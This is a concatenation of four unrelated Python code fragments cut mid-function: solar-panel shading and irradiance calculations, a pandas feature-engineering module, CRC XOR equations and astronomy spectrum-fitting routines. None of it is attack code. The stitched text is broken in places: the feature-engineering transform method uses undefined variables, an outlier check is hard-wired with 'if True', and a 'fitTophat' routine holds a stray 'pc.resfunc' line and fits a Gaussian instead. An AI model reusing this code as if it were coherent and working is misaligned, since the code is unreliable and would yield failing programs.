gtiAllpc, iso_dif, circ_dif, horiz_dif, grd_dif, beam = perezComp(dni, dhi, albedo, inc, tiltr, zen) # Call to get components for the tilt
# print "PEREZCOMP 2 = "
# print "gtiAllpc = ", vti
# print "iso_dif = ", iso_dif
# print "circ_dif = ", circ_dif
# print "horiz_dif = ", horiz_dif
# print "grd_dif = ", grd_dif
# print "beam = ", beam
cellShade = pvFrontSH * cellRows - i;
if (cellShade > 1.0): # Fully shaded if > 1, no shade if < 0, otherwise fractionally shaded
cellShade = 1.0;
elif (cellShade < 0.0):
cellShade = 0.0;
if (cellShade < 1.0 and inc < math.pi / 2.0): # Cell not shaded entirely and inc < 90 deg
cor = aOIcorrection(n2, inc); # Get AOI correction for beam and circumsolar
frontGTI[i] += (1.0 - cellShade) * (beam + circ_dif) * cor; # Add beam and circumsolar radiation
#frontReflected[i] += (1.0 - cellShade) * (beam + circ_dif) * (1.0 - cor * (1.0 - Ro)); # Reflected beam and circumsolar radiation from module
# End of for i = 0; i < cellRows loop
return aveGroundGHI, frontGTI, frontReflected;
# End of GetFrontSurfaceIrradiances
def getGroundShadeFactors(rowType, beta, C, D, elv, azm, sazm):
"""
This method determines if the ground is shaded from direct beam radiation
for points on the ground from the leading edge of one row of PV panels to
the leading edge of the next row of PV panels behind it. This row-to-row
dimension is divided into 100 ground segments and a ground shade factor is
returned for each ground segment, with values of 1 for shaded segments and
values of 0 for non shaded segments. The fractional amounts of shading of
the front and back surfaces of the PV panel are also returned. 8/20/2015
4/18/2016 - Modified to account for different row types. Because the ground
factors may now be different depending on row, they are calculated for the
row-to-row dimension to the rear of the leading module edge and to the
front of the leading edge. Also returned is the maximum shadow length
projected to the front or rear from the front of the module row
Parameters
----------
rowType : str
"first", "interior", "last", or "single"
beta
Tilt from horizontal of the PV modules/panels (deg)
C
Ground clearance of PV panel (in PV panel slope lengths)
D
Horizontal distance between rows of PV panels (in PV panel slope
lengths)
elv
Sun elevation (in radians)
azm
Sun azimuth (in radians)
sazm
Surface azimuth of PV panels (deg)
Returns
-------
pvFrontSH : numeric
Decimal fraction of the front surface of the PV panel that is shaded,
0.0 to 1.0
pvBackSH : numeric
Decimal fraction of the back surface of the PV panel that is shaded,
0.0 to 1.0
rearGroundSH : array of size [100]
Ground shade factors for ground segments to the rear, 0 = not shaded,
1 = shaded
frontGroundSH : array of size [100]
Ground shade factors for ground segments to the front, 0 = not shaded,
1 = shaded
maxShadow : numeric
Maximum shadow length projected to the front(-) or rear (+) from the
front of the module row (in PV panel slope lengths), only used later
for rowTypes other than "interior"
"""
rearGroundSH = []
frontGroundSH = []
beta = beta * DTOR # Tilt from horizontal of the PV modules/panels, in radians
sazm = sazm * DTOR # Surface azimuth of PV module/pamels, in radians
h = math.sin(beta); # Vertical height of sloped PV panel (in PV panel slope lengths)
x1 = math.cos(beta); # Horizontal distance from front of panel to rear of panel (in PV panel slope lengths)
rtr = D + x1; # Row-to-row distance (in PV panel slope lengths)
# Divide the row-to-row spacing into 100 intervals for calculating ground shade factors
delta = rtr / 100.0;
x = -delta / 2.0; # Initialize horizontal dimension x to provide midpoof intervals
Lh = (h / math.tan(elv)) * math.cos(sazm - azm); # Horizontal length of shadow perpindicular to row from top of module to bottom of module
Lhc = ((h + C) / math.tan(elv)) * math.cos(sazm - azm); # Horizontal length of shadow perpindicular to row from top of module to ground level
Lc = (C / math.tan(elv)) * math.cos(sazm - azm); # Horizontal length of shadow perpindicular to row from bottom of module to ground level
ss1 = 0.0; se1 = 0.0; ss2 = 0.0; se2 = 0.0; # Initialize shading start (s) and end (e) to zeros for two potential shading segments
pvFrontSH = 0.0;
pvBackSH = 0.0;
if (rowType == "interior"):
if (Lh > D): # Front side of PV module partially shaded, back completely shaded, ground completely shaded
pvFrontSH = (Lh - D) / (Lh + x1);
pvBackSH = 1.0;
ss1 = 0.0; # Ground shaded from 0.0 to rtr
se1 = rtr;
elif (Lh < -(rtr + x1)): # Back side of PV module partially shaded, front completely shaded, ground completely shaded
pvFrontSH = 1.0;
pvBackSH = (Lh + rtr + x1) / (Lh + x1);
ss1 = 0.0; # Ground shaded from 0.0 to rtr
se1 = rtr;
else: # Ground is partially shaded (I assume)
if (Lhc >= 0.0): # Shadow to rear of row, module front unshaded, back shaded
pvFrontSH = 0.0;
pvBackSH = 1.0;
Ss = Lc; # Shadow starts at Lc
Se = Lhc + x1; # Shadow ends here
while (Ss > rtr):
Ss -= rtr; # Put shadow in correct rtr space if needed
Se -= rtr;
ss1 = Ss;
se1 = Se;
if (se1 > rtr): # then need to use two shade areas
se1 = rtr;
ss2 = 0.0;
se2 = Se - rtr;
if (se2 > ss1):
# This would mean ground completely shaded, does this occur?
ss1 = 0.0; # Ground shaded from 0.0 to rtr
se1 = rtr;
else: # Shadow to front of row, either front or back might be shaded, depending on tilt and other factors
Ss = 0.0; # Shadow starts at Lc, initialize
Se = 0.0; # Shadow ends here, initialize
if (Lc < Lhc + x1):
pvFrontSH = | |
# !/usr/bin/python
# -*- coding: utf-8 -*-
"""
This script is designed to store some kind of feature engineering methods.
"""
# Import necessary libraries.
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy
import warnings
import logging
from scipy.stats import kstest
from scipy.stats import shapiro
import scipy.stats as spstats
from sklearn.preprocessing import *
import data_clean as dc
from config import output_log
from util import PowerTransformer
warnings.filterwarnings('ignore')
# Create logger for debugging.
output_log.init_log('./log/crawl_html')
class CategoryCombiner(object):
"""The class to combine categories with little instance.
"""
def __init__(self, cate_columns, discard_ratio=0.01):
"""Initialize class with given parameters.
:param cate_columns: List. The list of category columns, which would be processed.
:param discard_ratio: The ratio set to filter out categories which
should be combined.
"""
# Assign values of parameters.
self.cate_columns = cate_columns
self.discard_ratio = discard_ratio
# Create dictionary to store list of discard categories for each column.
self.discard_cate_dic = {}
def fit_transform(self, data):
"""Combine categories whose instance number is small, in train data.
Combine categories whose instance number is small, and replace
them with 'Others' value.
:param data: Dataframe. The Pandas dataframe to be processed.
:return: Dataframe. The result dataframe after processing.
"""
# Combine categories whose ratio are under discard_ratio into one 'Others' category.
for column in self.cate_columns:
total_num = float(sum(data[column].value_counts()))
discard_cate = []
for key in data[column].value_counts().keys():
if data[column].value_counts()[key] / total_num < self.discard_ratio:
discard_cate.append(key)
data[column] = data[column].replace(discard_cate, 'Others')
# Store discard categories for each column.
self.discard_cate_dic[column] = discard_cate
return data
def transform(self, data):
"""Combine categories for each column in test data.
Apply the method in fit() to transform test data in the same way.
:param data: Dataframe. The Pandas dataframe to be transformed.
:return: Dataframe. The dataframe after transforming.
"""
# Combine categories whose ratio are under discard_ratio into one 'Others' category.
for column in self.cate_columns:
discard_cate = self.discard_cate_dic[column]
data[column] = data[column].replace(discard_cate, 'Others')
return data
class CategoryFeatureEngineer(object):
"""The class to apply feature engineering automatically.
"""
def __init__(self, cate_columns):
"""Initialize class with given parameters.
:param cate_columns: List. The list consists of category column names.
"""
# Assign parameters.
self.cate_columns = cate_columns
# Create convert dictionary.
self.cate_encoding_dic = {}
self.cate_combiner = None
self.cate_label_dic = {}
self.cate_na_filler = None
def fit_transform(self, dataset):
"""Feature engineering for category columns.
Conduct feature engineering to category columns.
Including several kind of methods, as followings:
1. Fill NA wil 'missing'.
2. Combine small categories into one same category.
3. One-hot encoding for category columns.
:param dataset: Dataframe. The input dataframe.
:return: Dataframe. The output dataframe with converted category columns.
"""
# Fill None with 'missing' for category columns.
data = dataset.copy()
na_filler = dc.NaFiller()
data = na_filler.fit_transform(data, self.cate_columns)
self.cate_na_filler = na_filler
# Combine categories whose ratio are under 0.01 into one 'Others' category.
cate_combiner = CategoryCombiner(self.cate_columns)
data = cate_combiner.fit_transform(data)
self.cate_combiner = cate_combiner
# Label encoder to convert values in category column into numeric values.
result = pd.DataFrame()
for column in self.cate_columns:
gen_le = LabelEncoder()
result[column] = gen_le.fit_transform(data[column])
# Store label encoder into dictionary.
self.cate_label_dic[column] = gen_le
# Encode category columns with One-hot Encoding method.
gen_ohe = OneHotEncoder()
gen_ohe.fit(result[[column]])
gen_feature_arr = gen_ohe.transform(result[[column]]).toarray()
gen_feature_labels = [column + '_' + str(cls_label)
for cls_label in gen_le.classes_]
gen_features = pd.DataFrame(gen_feature_arr,
columns=gen_feature_labels)
result = pd.concat([result, gen_features], axis=1)
# Store encoders into dictionary.
self.cate_encoding_dic[column] = gen_ohe
data = data.reset_index()
# Add other columns into result.
for column in data.columns:
if column not in self.cate_columns and column != 'index':
result = pd.concat([result, data[column]], axis=1)
return result
def transform(self, data):
"""The feature engineering for category columns.
The feature engineering method applied on test data, using the same in
fit_transform() function.
:param data: Dataframe. The input Pandas dataframe, to be processed.
:return: Dataframe. The processed dataframe.
"""
# Fill None with 'missing' for category columns.
data = self.cate_na_filler.transform(data, self.cate_columns)
# Combine categories whose ratio are under 0.01 into one 'Others' category.
data = cate_combiner.transform(data)
# Label encoder to convert values in category column into numeric values.
for column in self.cate_columns:
# Apply label encoder to transform category columns.
data[column] = gen_le.transform(data[column])
# Encode category columns with One-hot Encoding method.
gen_feature_arr = gen_ohe.transform(data[[column]]).toarray()
gen_feature_labels = [column + '_' + str(cls_label)
for cls_label in gen_le.classes_]
gen_features = pd.DataFrame(gen_feature_arr,
columns=gen_feature_labels)
data = pd.concat([data, gen_features], axis=1)
return data
def column_type_detection(data, id_col, target_col):
"""Detect column type and collect according to column type.
Given id column name and target column name, divide columns into
ID_col, target_col, numeric_col and category_col.
:param data: Dataframe. The input dataframe in pandas form.
:param id_col: List. The list of ID column names.
:param target_col: List. The list of Target column names.
:return: List. Numeric_col, Category_col.
"""
# Loop through features and divide into two parts according to data types.
cate_columns = []
num_columns = []
for key in data.dtypes.keys():
# Skip id and target columns.
if key in id_col or key in target_col:
continue
# If data type is not in ['float', 'int'], column is collected by cate_col.
if data.dtypes[key] not in ['float', 'int']:
cate_columns.append(key)
# Convert all the cat_col into 'object' data type.
data[key] = data[key].astype('object')
else:
num_columns.append(key)
return num_columns, cate_columns
class NumericFeatureEngineer(object):
"""The class for numeric feature engineering.
"""
def __init__(self, num_columns):
"""Initialize class with given parameters.
:param num_columns: List. The list consists of numeric column names.
"""
# Assign parameters.
self.num_columns = num_columns
# Create dictionaries for converters.
self.num_transform_dic = {}
self.num_na_filler = None
@staticmethod
def check_normal_distribution(data):
"""Function to test whether the data is normal distribution or not.
Use some statistic methods to test normal distribution, numerically.
:param data: Dataframe. One column dataframe, waited to be tested.
:return:
stat: Some statistic result from test.
p: P-value to reject Null hypothesis, which means it's not normal distribution.
"""
# normality test
stat, p = shapiro(data)
return stat, p
def fit_transform(self, dataset):
"""Feature engineering for numeric columns.
Conduct feature engineering to numeric columns.
Including several kind of methods, as followings:
1. Fill NA wil mean.
3. Detect and convert to normal distribution.
4. Standardization.
5. Round to float3.
:param dataset: Dataframe. The input dataframe.
:return: Dataframe. The output dataframe with converted numeric columns.
"""
# Convert numerical columns whose distributions are not normal to normal distribution.
# Check whether the distribution is normal or not.
data = dataset.copy()
for column in self.num_columns:
print column
# Normality test.
stat, p = self.check_normal_distribution(data[column])
print(column, ': Statistics=%.3f, p=%.3f' % (stat, p)),
# When p-value is under 0.05, it means the distribution is different to normal distribution.
alpha = 0.05 # Set cutoff to reject the Null hypothesis.
if p < alpha:
print('Sample does not look Gaussian (reject H0)'),
# Calculate skewness of distribution.
skewness = data[column].skew(axis=0)
# Check whether there are outliers or not.
outlier_detector = dc.OutlierDetector(data, [], [])
outlier_index = outlier_detector.mean_detection(data[column])
# todo check outlier function.
if True:
# Check whether there are negative values.
print '\nThere is no outlier.'
if sum(data[column] < 0) == 0:
# If there is none of negative values, apply Box-cox transformation.
power_transformer = PowerTransformer(method='box-cox')
data[column] = power_transformer.fit_transform(data[column].reshape(-1, 1))
else:
# If there are some negative values, apply yeo-johnson method.
power_transformer = PowerTransformer(method='yeo-johnson')
data[column] = power_transformer.fit_transform(data[column].reshape(-1, 1))
# Store power transformer into dictionary.
self.num_transform_dic[column] = power_transformer
else:
# If there are some outliers, apply quantile transformer to normal distribution.
quantile_transformer = QuantileTransformer(output_distribution='normal', random_state=1021)
data[column] = quantile_transformer.fit_transform(data[column].reshape(-1, 1))
# Store quantile transformer into dictionary.
self.num_transform_dic[column] = quantile_transformer
else:
print('Sample looks Gaussian (fail to reject H0)')
# If the column is normal distribution, assign 'None' to transformer dictionary.
self.num_transform_dic[column] = None
# Round the number into .3float, to lower running time.
data = data.round(3)
# Fill None with 'mean' for numerical columns.
na_filler = dc.NaFiller()
data = na_filler.fit_transform(data, self.num_columns)
# Store imputer into dictionary.
self.num_na_filler = na_filler
return data
def transform(self, data):
"""Transform numeric column, especially for test data.
Apply same method in fit_transform() function to transform target dataframe.
:param data: Dataframe. The target Pandas dataframe to be transformed.
:return: Dataframe. The processed dataframe.
"""
# Convert numerical columns whose distributions are not normal to normal distribution.
for column in | |
^ q(31) ^ d(1) ^ d(5) ^ d(6) ^ d(9) ^ d(13) ^ d(14) ^ d(18) ^ d(20) ^ d(22) ^ d(23),
q(10) ^ q(14) ^ q(15) ^ q(18) ^ q(22) ^ q(23) ^ q(27) ^ q(29) ^ q(31) ^ d(2) ^ d(6) ^ d(7) ^ d(10) ^ d(14) ^ d(15) ^ d(19) ^ d(21) ^ d(23),
q(11) ^ q(15) ^ q(16) ^ q(19) ^ q(23) ^ q(24) ^ q(28) ^ q(30) ^ d(3) ^ d(7) ^ d(8) ^ d(11) ^ d(15) ^ d(16) ^ d(20) ^ d(22),
q(12) ^ q(16) ^ q(17) ^ q(20) ^ q(24) ^ q(25) ^ q(29) ^ q(31) ^ d(4) ^ d(8) ^ d(9) ^ d(12) ^ d(16) ^ d(17) ^ d(21) ^ d(23),
q(13) ^ q(17) ^ q(18) ^ q(21) ^ q(25) ^ q(26) ^ q(30) ^ d(5) ^ d(9) ^ d(10) ^ d(13) ^ d(17) ^ d(18) ^ d(22),
q(8) ^ q(17) ^ q(19) ^ q(20) ^ q(22) ^ q(24) ^ q(26) ^ q(27) ^ q(31) ^ d(0) ^ d(9) ^ d(11) ^ d(12) ^ d(14) ^ d(16) ^ d(18) ^ d(19) ^ d(23),
q(8) ^ q(9) ^ q(14) ^ q(17) ^ q(21) ^ q(23) ^ q(24) ^ q(25) ^ q(27) ^ q(28) ^ d(0) ^ d(1) ^ d(6) ^ d(9) ^ d(13) ^ d(15) ^ d(16) ^ d(17) ^ d(19) ^ d(20),
q(0) ^ q(9) ^ q(10) ^ q(15) ^ q(18) ^ q(22) ^ q(24) ^ q(25) ^ q(26) ^ q(28) ^ q(29) ^ d(1) ^ d(2) ^ d(7) ^ d(10) ^ d(14) ^ d(16) ^ d(17) ^ d(18) ^ d(20) ^ d(21),
q(1) ^ q(10) ^ q(11) ^ q(16) ^ q(19) ^ q(23) ^ q(25) ^ q(26) ^ q(27) ^ q(29) ^ q(30) ^ d(2) ^ d(3) ^ d(8) ^ d(11) ^ d(15) ^ d(17) ^ d(18) ^ d(19) ^ d(21) ^ d(22),
q(2) ^ q(8) ^ q(11) ^ q(12) ^ q(14) ^ q(18) ^ q(26) ^ q(27) ^ q(28) ^ q(30) ^ q(31) ^ d(0) ^ d(3) ^ d(4) ^ d(6) ^ d(10) ^ d(18) ^ d(19) ^ d(20) ^ d(22) ^ d(23),
q(3) ^ q(9) ^ q(12) ^ q(13) ^ q(15) ^ q(19) ^ q(27) ^ q(28) ^ q(29) ^ q(31) ^ d(1) ^ d(4) ^ d(5) ^ d(7) ^ d(11) ^ d(19) ^ d(20) ^ d(21) ^ d(23),
q(4) ^ q(10) ^ q(13) ^ q(14) ^ q(16) ^ q(20) ^ q(28) ^ q(29) ^ q(30) ^ d(2) ^ d(5) ^ d(6) ^ d(8) ^ d(12) ^ d(20) ^ d(21) ^ d(22),
q(5) ^ q(11) ^ q(14) ^ q(15) ^ q(17) ^ q(21) ^ q(29) ^ q(30) ^ q(31) ^ d(3) ^ d(6) ^ d(7) ^ d(9) ^ d(13) ^ d(21) ^ d(22) ^ d(23),
q(6) ^ q(12) ^ q(15) ^ q(16) ^ q(18) ^ q(22) ^ q(30) ^ q(31) ^ d(4) ^ d(7) ^ d(8) ^ d(10) ^ d(14) ^ d(22) ^ d(23),
q(7) ^ q(13) ^ q(16) ^ q(17) ^ q(19) ^ q(23) ^ q(31) ^ d(5) ^ d(8) ^ d(9) ^ d(11) ^ d(15) ^ d(23),
)
def _generate_next_2B_crc(self, current_crc, data_in):
""" Generates the next round of our CRC; given a 2B trailing input word . """
# Helper functions that help us more clearly match the expanded polynomial form.
d = lambda i : data_in[len(data_in) - i - 1]
q = lambda i : current_crc[i]
# These lines are extremely long, but there doesn't seem any advantage in clarity to splitting them.
return Cat(
q(16) ^ q(22) ^ q(25) ^ q(26) ^ q(28) ^ d(0) ^ d(6) ^ d(9) ^ d(10) ^ d(12),
q(16) ^ q(17) ^ q(22) ^ q(23) ^ q(25) ^ q(27) ^ q(28) ^ q(29) ^ d(0) ^ d(1) ^ d(6) ^ d(7) ^ d(9) ^ d(11) ^ d(12) ^ d(13),
q(16) ^ q(17) ^ q(18) ^ q(22) ^ q(23) ^ q(24) ^ q(25) ^ q(29) ^ q(30) ^ d(0) ^ d(1) ^ d(2) ^ d(6) ^ d(7) ^ d(8) ^ d(9) ^ d(13) ^ d(14),
q(17) ^ q(18) ^ q(19) ^ q(23) ^ q(24) ^ q(25) ^ q(26) ^ q(30) ^ q(31) ^ d(1) ^ d(2) ^ d(3) ^ d(7) ^ d(8) ^ d(9) ^ d(10) ^ d(14) ^ d(15),
q(16) ^ q(18) ^ q(19) ^ q(20) ^ q(22) ^ q(24) ^ q(27) ^ q(28) ^ q(31) ^ d(0) ^ d(2) ^ d(3) ^ d(4) ^ d(6) ^ d(8) ^ d(11) ^ d(12) ^ d(15),
q(16) ^ q(17) ^ q(19) ^ q(20) ^ q(21) ^ q(22) ^ q(23) ^ q(26) ^ q(29) ^ d(0) ^ d(1) ^ d(3) ^ d(4) ^ d(5) ^ d(6) ^ d(7) ^ d(10) ^ d(13),
q(17) ^ q(18) ^ q(20) ^ q(21) ^ q(22) ^ q(23) ^ q(24) ^ q(27) ^ q(30) ^ d(1) ^ d(2) ^ d(4) ^ d(5) ^ d(6) ^ d(7) ^ d(8) ^ d(11) ^ d(14),
q(16) ^ q(18) ^ q(19) ^ q(21) ^ q(23) ^ q(24) ^ q(26) ^ q(31) ^ d(0) ^ d(2) ^ d(3) ^ d(5) ^ d(7) ^ d(8) ^ d(10) ^ d(15),
q(16) ^ q(17) ^ q(19) ^ q(20) ^ q(24) ^ q(26) ^ q(27) ^ q(28) ^ d(0) ^ d(1) ^ d(3) ^ d(4) ^ d(8) ^ d(10) ^ d(11) ^ d(12),
q(17) ^ q(18) ^ q(20) ^ q(21) ^ q(25) ^ q(27) ^ q(28) ^ q(29) ^ d(1) ^ d(2) ^ d(4) ^ d(5) ^ d(9) ^ d(11) ^ d(12) ^ d(13),
q(16) ^ q(18) ^ q(19) ^ q(21) ^ q(25) ^ q(29) ^ q(30) ^ d(0) ^ d(2) ^ d(3) ^ d(5) ^ d(9) ^ d(13) ^ d(14),
q(16) ^ q(17) ^ q(19) ^ q(20) ^ q(25) ^ q(28) ^ q(30) ^ q(31) ^ d(0) ^ d(1) ^ d(3) ^ d(4) ^ d(9) ^ d(12) ^ d(14) ^ d(15),
q(16) ^ q(17) ^ q(18) ^ q(20) ^ q(21) ^ q(22) ^ q(25) ^ q(28) ^ q(29) ^ q(31) ^ d(0) ^ d(1) ^ d(2) ^ d(4) ^ d(5) ^ d(6) ^ d(9) ^ d(12) ^ d(13) ^ d(15),
q(17) ^ q(18) ^ q(19) ^ q(21) ^ q(22) ^ q(23) ^ q(26) ^ q(29) ^ q(30) ^ d(1) ^ d(2) ^ d(3) ^ d(5) ^ d(6) ^ d(7) ^ d(10) ^ d(13) ^ d(14),
q(18) ^ q(19) ^ q(20) ^ q(22) ^ q(23) ^ q(24) ^ q(27) ^ q(30) ^ q(31) ^ d(2) ^ d(3) ^ d(4) ^ d(6) ^ d(7) ^ d(8) ^ d(11) ^ d(14) ^ d(15),
q(19) ^ q(20) ^ q(21) ^ q(23) ^ q(24) ^ q(25) ^ q(28) ^ q(31) ^ d(3) ^ d(4) ^ d(5) ^ d(7) ^ d(8) ^ d(9) ^ d(12) ^ d(15),
q(0) ^ q(16) ^ q(20) ^ q(21) ^ q(24) ^ q(28) ^ q(29) ^ d(0) ^ d(4) ^ d(5) ^ d(8) ^ d(12) ^ d(13),
q(1) ^ q(17) ^ q(21) ^ q(22) ^ q(25) ^ q(29) ^ q(30) ^ d(1) ^ d(5) ^ d(6) ^ d(9) ^ d(13) ^ d(14),
q(2) ^ q(18) ^ q(22) ^ q(23) ^ q(26) ^ q(30) ^ q(31) ^ d(2) ^ d(6) ^ d(7) ^ d(10) ^ d(14) ^ d(15),
q(3) ^ q(19) ^ q(23) ^ q(24) ^ q(27) ^ q(31) ^ d(3) ^ d(7) ^ d(8) ^ d(11) ^ d(15),
q(4) ^ q(20) ^ q(24) ^ q(25) ^ q(28) ^ d(4) ^ d(8) ^ d(9) ^ d(12),
q(5) ^ q(21) ^ q(25) ^ q(26) ^ q(29) ^ d(5) ^ d(9) ^ d(10) ^ d(13),
q(6) ^ q(16) ^ q(25) ^ q(27) ^ q(28) ^ q(30) ^ d(0) ^ d(9) ^ d(11) ^ d(12) ^ d(14),
q(7) ^ q(16) ^ q(17) ^ q(22) ^ q(25) ^ q(29) ^ q(31) ^ d(0) ^ d(1) ^ d(6) ^ d(9) ^ d(13) ^ d(15),
q(8) ^ q(17) ^ q(18) ^ q(23) ^ q(26) ^ q(30) ^ d(1) ^ d(2) ^ d(7) ^ d(10) | |
"""
Suite to reduce spectroscopic data.
subfunctions:
calibrate
setheaders -- exptime, gain, readnoise, etc.
makeflat -- make median flat and noisy pixel map
makedark -- make median dark, and estimate noise in each pixel.
clean -- clean and replace bad pixels
extract
trace -- trace spectral orders
makeprofile -- compute mean spectral PSF (a spline) for an order
fitprofile -- fit given spline-PSF to a spectral cross-section
Utilities:
pickloc
fitPSF
"""
# 2010-07-02 10:56 IJC: Began the great endeavor.
try:
from astropy.io import fits as pyfits
except:
import pyfits
import matplotlib.pyplot as plt
import numpy as np
from scipy import optimize, interpolate
import pdb
class baseObject:
"""Empty object container.
"""
def __init__(self):
return
########
# Utilities to add in a separate cohesive package at a later date:
from analysis import polyfitr, stdr, binarray, gaussian, egaussian
import analysis as an
from nsdata import bfixpix
########
# Parameters to put in a GUI:
gain = 5 # e-/ADU
readnoise = 25 # e-
#########
def message(text):
"""Display a message; for now, with text."""
from sys import stdout
print text
stdout.flush()
def pickloc(ax=None, zoom=10):
"""
:INPUTS:
ax : (axes instance) -- axes in which to pick a location
zoom : int -- zoom radius for target confirmation
: 2-tuple -- (x,y) radii for zoom confirmation.
"""
# 2011-04-29 19:26 IJC:
# 2011-09-03 20:59 IJMC: Zoom can now be a tuple; x,y not cast as int.
pickedloc = False
if ax is None:
ax = plt.gca()
axlimits = ax.axis()
if hasattr(zoom, '__iter__') and len(zoom)>1:
xzoom, yzoom = zoom
else:
xzoom = zoom
yzoom = zoom
while not pickedloc:
ax.set_title("click to select location")
ax.axis(axlimits)
x = None
while x is None:
selectevent = plt.ginput(n=1,show_clicks=False)
if len(selectevent)>0: # Prevent user from cancelling out.
x,y = selectevent[0]
#x = x.astype(int)
#y = y.astype(int)
if zoom is not None:
ax.axis([x-xzoom,x+xzoom,y-yzoom,y+yzoom])
ax.set_title("you selected xy=(%i,%i)\nclick again to confirm, or press Enter/Return to try again" %(x,y) )
plt.draw()
confirmevent = plt.ginput(n=1,show_clicks=False)
if len(confirmevent)>0:
pickedloc = True
loc = confirmevent[0]
return loc
def fitTophat(vec, err=None, verbose=False, guess=None):
"""Fit a 1D tophat function to an input data vector.
Return the fit, and uncertainty estimates on that fit.
SEE ALSO: :func:`analysis.gaussian`"""
xtemp = np.arange(1.0*len(vec))
if guess is None: # Make some educated guesses as to the parameters:
pedestal = 0.5 * (0.8*np.median(vec) + 0.2*(vec[0]+vec[1]))
area = (vec-pedestal).sum()
centroid = (vec*xtemp).sum()/vec.sum()
if centroid<0:
centroid = 1.
elif centroid>len(vec):
centroid = len(vec)-2.
sigma = area/vec[int(centroid)]/np.sqrt(2*np.pi)
if sigma<=0:
sigma = 0.01
guess = [area,sigma,centroid,pedestal]
if verbose:
print 'Gaussian guess parameters>>', guess
if err is None:
fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec), full_output=True)[0:2]
pc.resfunc
fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec), full_output=True)[0:2]
else:
fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec, err), full_output=True)[0:2]
if fitcov is None: # The fitting was really bad!
fiterr = np.abs(fit)
else:
fiterr = np.sqrt(np.diag(fitcov))
if verbose:
print 'Best-fit parameters>>', fit
f = plt.figure()
ax = plt.axes()
plt.plot(xtemp, vec, 'o', \
xtemp, gaussian(fit, xtemp), '-', \
xtemp, gaussian(guess, xtemp), '--')
return fit, fiterr
def fitGaussian(vec, err=None, verbose=False, guess=None):
"""Fit a Gaussian function to an input data vector.
Return the fit, and uncertainty estimates on that fit.
SEE ALSO: :func:`analysis.gaussian`"""
# 2012-12-20 13:28 IJMC: Make a more robust guess for the centroid.
xtemp = np.arange(1.0*len(vec))
if guess is None: # Make some educated guesses as to the parameters:
pedestal = (0.8*np.median(vec) + 0.2*(vec[0]+vec[1]))
area = (vec-pedestal).sum()
centroid = ((vec-pedestal)**2*xtemp).sum()/((vec-pedestal)**2).sum()
if centroid<0:
centroid = 1.
elif centroid>len(vec):
centroid = len(vec)-2.
#pdb.set_trace()
sigma = area/vec[int(centroid)]/np.sqrt(2*np.pi)
if sigma<=0:
sigma = .01
guess = [area,sigma,centroid,pedestal]
if err is None:
err = np.ones(vec.shape, dtype=float)
badvals = True - (np.isfinite(xtemp) * np.isfinite(err) * np.isfinite(vec))
vec[badvals] = np.median(vec[True - badvals])
err[badvals] = vec[True - badvals].max() * 1e9
if verbose:
print 'Gaussian guess parameters>>', guess
if not np.isfinite(xtemp).all():
pdb.set_trace()
if not np.isfinite(vec).all():
pdb.set_trace()
if not np.isfinite(err).all():
pdb.set_trace()
try:
fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec, err), full_output=True)[0:2]
except:
pdb.set_trace()
if fitcov is None: # The fitting was really bad!
fiterr = np.abs(fit)
else:
fiterr = np.sqrt(np.diag(fitcov))
#pdb.set_trace()
if verbose:
print 'Best-fit parameters>>', fit
f = plt.figure()
ax = plt.axes()
plt.plot(xtemp, vec, 'o', \
xtemp, gaussian(fit, xtemp), '-', \
xtemp, gaussian(guess, xtemp), '--')
return fit, fiterr
def fitGaussiann(vec, err=None, verbose=False, guess=None, holdfixed=None):
"""Fit a Gaussian function to an input data vector.
Return the fit, and uncertainty estimates on that fit.
SEE ALSO: :func:`analysis.gaussian`"""
from phasecurves import errfunc
from analysis import fmin
xtemp = np.arange(1.0*len(vec))
if guess is None: # Make some educated guesses as to the parameters:
holdfixed = None
pedestal = 0.5 * (0.8*np.median(vec) + 0.2*(vec[0]+vec[1]))
area = (vec-pedestal).sum()
centroid = (vec*xtemp).sum()/vec.sum()
if centroid<0:
centroid = 1.
elif centroid>len(vec):
centroid = len(vec)-2.
sigma = area/vec[int(centroid)]/np.sqrt(2*np.pi)
if sigma<=0:
sigma = 0.01
guess = [area,sigma,centroid,pedestal]
if err is None:
err = np.ones(vec.shape, dtype=float)
badvals = True - (np.isfinite(xtemp) * np.isfinite(err) * np.isfinite(vec))
vec[badvals] = np.median(vec[True - badvals])
err[badvals] = vec[True - badvals].max() * 1e9
if verbose:
print 'Gaussian guess parameters>>', guess
if not np.isfinite(xtemp).all():
pdb.set_trace()
if not np.isfinite(vec).all():
pdb.set_trace()
if not np.isfinite(err).all():
pdb.set_trace()
try:
#fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec, err), full_output=True)[0:2]
fitargs = (gaussian, xtemp, vec, 1./err**2)
fit = fmin(errfunc, guess, args=fitargs, full_output=True, disp=False, holdfixed=holdfixed)[0]
fitcov = None
except:
pdb.set_trace()
if fitcov is None: # The fitting was really bad!
fiterr = np.abs(fit)
else:
fiterr = np.sqrt(np.diag(fitcov))
if verbose:
print 'Best-fit parameters>>', fit
f = plt.figure()
ax = plt.axes()
plt.plot(xtemp, vec, 'o', \
xtemp, gaussian(fit, xtemp), '-', \
xtemp, gaussian(guess, xtemp), '--')
return fit, fiterr
def fit2Gaussian(vec, err=None, verbose=False, guess=None, holdfixed=None):
"""Fit two Gaussians simultaneously to an input data vector.
:INPUTS:
vec : sequence
1D array or list of values to fit to
err : sequence
uncertainties on vec
guess : sequence
guess parameters: [area1, sigma1, cen1, area2, sig2, cen2, constant].
Note that parameters are in pixel units.
holdfixed : sequence
parameters to hold fixed in analysis, _IF_ guess is passed in.
SEE ALSO: :func:`analysis.gaussian`, :func:`fitGaussian`"""
# 2012-03-14 14:33 IJMC: Created
from tools import sumfunc
from phasecurves import errfunc
from analysis import fmin # Don't use SciPy, because I want keywords!
xtemp = np.arange(1.0*len(vec))
if err is None:
err = np.ones(xtemp.shape)
else:
err = np.array(err, copy=False)
if guess is None: # Make some semi-educated guesses as to the parameters:
holdfixed = None
pedestal = 0.5 * (0.8*np.median(vec) + 0.2*(vec[0]+vec[1]))
area = (vec-pedestal).sum()
centroid = (vec*xtemp).sum()/vec.sum()
if centroid<0:
centroid = 1.
elif centroid>len(vec):
centroid = len(vec)-2.
sigma = area/vec[int(centroid)]/np.sqrt(2*np.pi)
if sigma<=0:
sigma = 0.01
